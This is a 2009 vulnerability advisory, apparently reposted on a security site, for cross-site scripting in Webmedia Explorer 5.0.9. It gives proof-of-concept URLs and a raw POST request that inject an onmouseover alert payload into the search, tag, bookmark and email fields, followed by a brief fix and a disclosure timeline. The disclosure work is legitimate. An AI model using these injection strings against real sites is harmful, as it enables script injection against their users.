Webmedia Explorer - XSS Vulnerability

2009.06.21
Credit: MaXe
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Webmedia Explorer - Cross Site Scripting Vulnerability Version Affected: 5.0.9 (newest is: 5.10.0) Info: Webmedia Explorer is the alternative CMS engine that reads the hard disc and generates a website realtime taking advantage of a very powerful rendering and data fetching caching system. Credits: InterN0T External Links: http://www.webmediaexplorer.com/ -:: The Advisory ::- Vulnerable Function / ID Calls: search, tag, bookmark & "another function that registers all extra calls" Cross Site Scripting: (by using event handlers) http://[HOST]/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) --- -- Will be executed when a user moves his mouse over the search field. http://[HOST]/webmediaexpl/htdocs/?tag=" onmouseover=alert(0) --- -- Will be executed when a user moves his mouse over a tag. http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')" onmouseover=alert(0) > --- -- Will be executed when a user moves his mouse over the column field. (unlikely) http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > ---&action=edit -- Requires admin access, however since this is a hidden tag exploitation is highly unlikely. POST Method - Cross Site Scripting: Host: [HOST] User-Agent: FireFox-3-RoXx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://[HOST]/webmediaexpl/htdocs/index.php?action=remember Content-Type: application/x-www-form-urlencoded Content-Length: 58 Post Content: email=%22+onmouseover%3Dalert%280%29+%3E+---&captcha_code= (the following was sent: " onmouseover=alert(0) > --- ) -:: Solution ::- Filtering event handlers should do the trick. Conclusion: A pretty secure system over all, nice to see. Reference: http://forum.intern0t.net/intern0t-advisories/1123-intern0t-webmedia-exp lorer-cross-site-scripting-vulnerability.html Disclosure Information: - Vulnerabilities found, researched and confirmed between 5th to 10th June. - Advisory finished and published on InterN0T the 12th June. - Vendor and Buqtraq (SecurityFocus) contacted the 12th June. All of the best, MaXe

References:

http://www.securityfocus.com/archive/1/archive/1/504307/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top